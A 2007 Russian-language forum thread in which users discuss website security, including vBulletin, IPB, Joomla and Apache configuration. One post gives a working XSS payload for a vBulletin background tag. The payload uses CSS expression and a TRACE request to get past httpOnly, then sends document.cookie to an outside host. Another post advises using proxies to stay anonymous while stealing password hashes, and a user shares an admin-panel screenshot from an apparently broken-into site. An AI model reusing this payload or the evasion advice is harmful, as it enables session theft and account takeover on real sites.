View Poll Results: Нужна ли такая тема?

Voters
12. You may not vote on this poll
  • Да

    6 50.00%
  • Нет

    0 0%
  • Не знаю

    0 0%
  • Пох

    6 50.00%
Page 1 of 2 12 LastLast
Results 1 to 20 of 22

Thread: Friendly hack

  1. #1
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default Friendly hack

    Предлагаю в этой теме делиться впечатлениями и советами по безопасности сайтов. Не буду выпендриваться, типа какой круть и все такое... Чисто информация и все! Нравится идея?
    йужнайепиворуль

  2. #2
    Пiнгвiнятко Живет здесь МакарЧег's Avatar
    Join Date
    Jun 2006
    Расположение
    Азов
    Posts
    1,558
    Rep Power
    64

    Default Ответ: Friendly hack

    Думаю, что да! А ещё бы хотелось знать не только об безопасности сайтов, но и форумов.
    Компьютер не подчиняется законам физики.
    Только в нём глюки возникают из ничего,
    файлы исчезают в никуда, а объём измеряется
    в метрах и называется весом.

  3. #3
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Friendly hack

    гг ) темка радует ))

    Форум: vbulletin 3.6.7 Null от Ateist
    Нашёл в таком форуме xss-язву в теге background (установка цвета фона). Тег устанавливает цвет фона через стили, никаки проверок на правильность введённого цвета нету, можно встроить любой код. Есть 2 варианта использования:
    1) java script: ....;

    Работает только в ИЕ6.
    В слово Javascript просто вставляется символ Tab, это позваоляет обмануть парсер, который после слова Javascript (и т.п.) вставляет <b></b> (как-то нелогично, но скрипт срывает ))).
    2)Через выражение expression:
    expression(eval('текст скрипта'));
    Для запуска скрипта используется eval, т.к. внутри expression'а может быть только одно выражение.
    В тексте скрипта необходимо заместо кавычек использовать выражение String.fromCharCode(39);
    Пример:
    expression(eval('alert('+String.fromCharCode(39)+' БУ!'+String.fromCharCode(39)+')'));

    ----
    Пример использования язвы (не помню, рабочая версия или нет, но тестовый):
    Code:
    [background=#FFFFFF;color:expression(eval('set_cookie('+String.fromCharCode(39)+'qqq'+String.fromCharCode(39)+',eval(fetch_cookie('+String.fromCharCode(39)+'qqq'+String.fromCharCode(39)+'))+1);if (fetch_cookie('+String.fromCharCode(39)+'qqq'+String.fromCharCode(39)+')<2) {alert(1);var x = new ActiveXObject('+String.fromCharCode(39)+'Microsoft.XMLHTTP'+String.fromCharCode(39)+');alert(2);x.open(String.fromCharCode(13)+String.fromCharCode(10)+'+String.fromCharCode(39)+'TRACE'+String.fromCharCode(39)+','+String.fromCharCode(39)+'http://forum.cyber-city.ru/'+String.fromCharCode(39)+',false);alert(String.fromCharCode(13)+String.fromCharCode(10)+'+String.fromCharCode(39)+'nTRACE'+String.fromCharCode(39)+');x.setRequestHeader('+String.fromCharCode(39)+'Max-Forwards'+String.fromCharCode(39)+','+String.fromCharCode(39)+'0'+String.fromCharCode(39)+');alert(4);x.send();alert(x.responseText);a=document.createElement('+String.fromCharCode(39)+'img'+String.fromCharCode(39)+');a.src='+String.fromCharCode(39)+'http://s.netsec.ru/XXXXXXX.gif?'+String.fromCharCode(39)+'+document.cookie+x.responseText;delete_cookie('+String.fromCharCode(39)+'vbulletin_collapse'+String.fromCharCode(39)+')}'));]Траляля[/background]
    В кукизах создаётся параметр, чтобы в течении текущей сессии от него данные шли только один раз, expression имеет особенность выполнять скрипт бесконечное число раз из-за прорисовок страницы и просчитывания положения элементов. Функции для работы с кукизами встроены в скрипты форума.

    -------
    Таким образом легко можно внедрить в форум js-файл, или просто вставить картинку со сниффером.

    При воровстве кукизов мешает флаг httpOnly. Обойти его можно используя XST (хотя некоторые серверы могут блокировать trace-запросы), работает на ИЕ6 с патчами, на ИЕ7 уже не работает. Тем не менее, этого может хватить, чтобы получить хэш админа, если он сидит на ИЕ6.

    --------
    Чтобы исправить язву, нужно либо запретить тег, либо ввести в нём проверку на наличие ";" и ":" (этого вполне хватит, по-моему). Подробностей не скажу, т.к никада не видел исходников этого форума.

    Это по поводу Буллетина) По другим форумам последний годик не зыркал язв ))
    Last edited by PGArchangel; 18-09-2007 at 00:26.
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

  4. #4
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Friendly hack

    Хотел вообще высказать мысль, что vBulletin довольно-таки надёжен и его трудно взломать. И не ставьте null'ы от всяких типов )))

    Ещё хотел сказать, что IPB 1.3 - супердырявый форум!!!! Но у меня стоит именно он. Если с ним хорошенько поработать, исправить XSS, включить флаг httpOnly для member_id и passhash, убрать язву с заливкой "не-смайлов" в админке, убрать язву при логине, на которой работают эксплоиты для подбора хэшей, то будет хороший и надёжный форум, т.к. после всех исправлений бушь его наизусть знать ))))
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

  5. #5
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default Отв: Ответ: Friendly hack

    Признаюсь в страшном: когда создавал эту тему, у меня уже была наработка на эту тему! И мне особенно приятно слышать (читать то есть) сообщения о секьюрности! :р

    По желанию могу вывалить скрин админки, что там можно понаделать...
    Но я думаю, что автору модового сайта будет интересней узнать что ему надо поправить, нежели как его ломали....

    Мне думается, что проникновение без использования инфы в корыстных целях не будет караться?
    Last edited by TijAY; 18-09-2007 at 15:20.
    йужнайепиворуль

  6. #6
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Отв: Ответ: Friendly hack

    Эм... Да вообще-то хищение пароля/хеша - это уже кража информации... ))) Поэтому это надо делать через несколько проксиков, и точно также можно зарегать мыло через прокси и послать им анонимное письмо...

    А чё за скрин? И чё за сайт?
    Last edited by PGArchangel; 18-09-2007 at 18:40.
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

  7. #7
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default

    Вот скрин - пароль для доступа сюда не обязателен....
    Attached Images Attached Images  
    йужнайепиворуль

  8. #8
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Friendly hack

    гг ) Прикольно ) Так чисто интересно, взломал через форум или на сайте есть язва? ) Напиши в личку подробности. И ещё как давно ты это сделал? )
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

  9. #9
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default Отв: Ответ: Friendly hack

    17.09.2007 - сначала просмотр каталогов, анализ кода, подбор инструкции к апачу... кривой апач - большая жопа...

    а насчет иньекций в бд - есть пара-тройка линков на примете. но нет особенно времени на просмотр.
    йужнайепиворуль

  10. #10
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Отв: Ответ: Friendly hack

    Quote Originally Posted by TijAY
    17.09.2007 - сначала просмотр каталогов, анализ кода, подбор инструкции к апачу... кривой апач - большая жопа...

    а насчет иньекций в бд - есть пара-тройка линков на примете. но нет особенно времени на просмотр.
    Насчёт инъекций в БД - именно в сайте их не может быть. БД файловая пока ещё, MySQL подключена только в одном плагине и то там инъеций вообще не может быть. Но скоро всё же на MySQL прйдётся перейти...
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

  11. #11
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default

    знаешь, мне как раз кое-какие воспоминания из разговор с тобой и пригодились.. вобщем, особо не заморачивайся, а просто нормально сконфигурируй апач. а то не только тебя поломают, но и соседей по хосту, если он только не в chroot'e..

    поймите самое главное: цель темы - не показать какой кто тут круть, какой офигенный пацанчег и прочее. тема для обмена опытом, реальным опытом. обратив внимание на некоторые раскрытые здесь аспекты мы сможем сделать свои сайты более защищенными. а это - наше время, наши деньги...

    был случай, когда один ресурс ломался так же "дружески" - на вопрос админу о наличии бекапа, получил ответ: а мы тут пиво пьем..

    сам грешен - бекап делается нерегулярно. поэтому может быть есть смысл выбирать хостера по-серьезней? кстати, как вам тема о хостерах? либо же уметь самостоятельно написать скрипты по авто-бекапу.... кому как проще.

    повторюсь, тема не о том, у кого длиннее, а как сделать так, чтобы не облажаться!
    Last edited by TijAY; 18-10-2007 at 16:50.
    йужнайепиворуль

  12. #12
    Сетевой бездельник.. С опытом Netwanderer's Avatar
    Join Date
    Jan 2006
    Расположение
    localhost
    Posts
    488
    Blog Entries
    2
    Rep Power
    59

    Default Отв: Friendly hack

    Ну тема-то, допустим, нужна.. А вот кто протестит на дырки мой сайтег? Чисто и вам потренироваться, и мне поглядеть - что я не учел... Адрес в подписи. Токо чур ничего не ломать на сайте! =)

    © 1990-2010, Netwanderer
    I'm using:
    19'', 1280x1024, Intel Core2Duo, nVidia, Asus, MSI, HP, Sony, Sennheiser, Seagate, Western Digital, Transcend, NEC, Thermaltake, Logitech, Nokia N95 8Gb
    Ubuntu 9.10 Karmic Koala, Opera, Mozilla Thunderbird, uTorrent, qutIM, Rhythmbox, livejournal.com, google.com, mail.ru
    Sharktech.ru, Netwanderer.net.ru, CyberDrug.net.ru

  13. #13
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default

    У некоторых пользователей ни аватары, ни подписи не отображаются, чтобы смысловую нагрузку сообщений лучше видеть

    А что дашь за свой сайт? Ссылку на главной?

    Joomla! - конечно хороший CMS. Но:
    http://projector.gigafreehost.net/administrator/ - в правом верхнем смотрим версию. Там чотка - 1.0.12

    А что это значит? ЧТо версия 1.0.13 прошла стороной Не считая версий компонентов и расширений...
    Last edited by TijAY; 18-10-2007 at 16:50.
    йужнайепиворуль

  14. #14
    Участник форума С опытом Blacker's Avatar
    Join Date
    May 2005
    Расположение
    Азов
    Posts
    248
    Rep Power
    59

    Default Ответ: Отв: Friendly hack

    Я бы не спешил переходить на 13
    http://joomlaportal.ru/content/view/1371/70/


  15. #15
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default Отв: Ответ: Отв: Friendly hack

    Здесь речь идет не о дырах, а о несовместимостях. Если известно, то в версии 1.0.13 была введена переменная, отвечающаю за совместимость с компонентами и модулями. Может что-то работает и не так. Но для чего используется CommunityBuilder? Или всякие коннекторы-мосты? Для интеграции, например, с форумами. Как это влияет на проблемы безопасности, которые исправил этот релиз? У меня стоит несколько сайтов на 13-ой версии. И ничего. Если вспомнить флейм на русскоязыном портале, то все страхи сводились к суевериям на тему 13-го релиза. Вот и все.... Мое мнение.
    йужнайепиворуль

  16. #16
    Участник форума С опытом Blacker's Avatar
    Join Date
    May 2005
    Расположение
    Азов
    Posts
    248
    Rep Power
    59

    Default Ответ: Отв: Ответ: Отв: Friendly hack

    Я не спорю что 13 безопаснее, имелось в виду проблема с совместимостью. Да сайт будет безопаснее, но потеряет свой функционал за счёт несовместимости расширений. ИМХО
    Я бы подождал выхода компонентов, а потом только обновился


  17. #17
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default Отв: Ответ: Отв: Ответ: Отв: Friendly hack

    Если на сайте нет ничего, что несовместимо с новой версией, то чего ждать? Налетов турецких хацкеров?
    йужнайепиворуль

  18. #18
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Отв: Ответ: Отв: Ответ: Отв: Friendly hack

    Слух, Тидж, тут знакомый ищет новый хостинг, чтоб ты мог посоветовать? То есть, какой у них там должен быть версии апач, PHP, MySQL, чё понадёжнее?
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

  19. #19
    the acorn TijAY's Avatar
    Join Date
    Nov 2002
    Posts
    3,648
    Blog Entries
    3
    Rep Power
    83

    Default Отв: Ответ: Отв: Ответ: Отв: Ответ: Отв: Friendly hack

    Вопрос немного не по теме. Хостеров обсуждаем здесь - http://www.azov.info/forum/showthread.php?t=5605
    йужнайепиворуль

  20. #20
    Участник форума С опытом PGArchangel's Avatar
    Join Date
    Mar 2006
    Расположение
    Азов
    Posts
    376
    Blog Entries
    1
    Rep Power
    56

    Default Ответ: Отв: Ответ: Отв: Ответ: Отв: Ответ: Отв: Friendly hack

    Я не про хостеров. А про, например, версии апача, в которых htaccess работает правильно. ) Я так понял, что ты хорошо разбираешься в багах и язвах апача. )
    Сайт нашей команды модмейкеров (Global Mod на Готику 2НВ):
    http://magic-team.net.ru/


    ····__·····
    ···/0o\····
    ···└&#175;&#175;┘····
    [:░|░|░|░:]

Page 1 of 2 12 LastLast

Социальные закладки

Социальные закладки

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Яндекс.Метрика
Locations of visitors to this page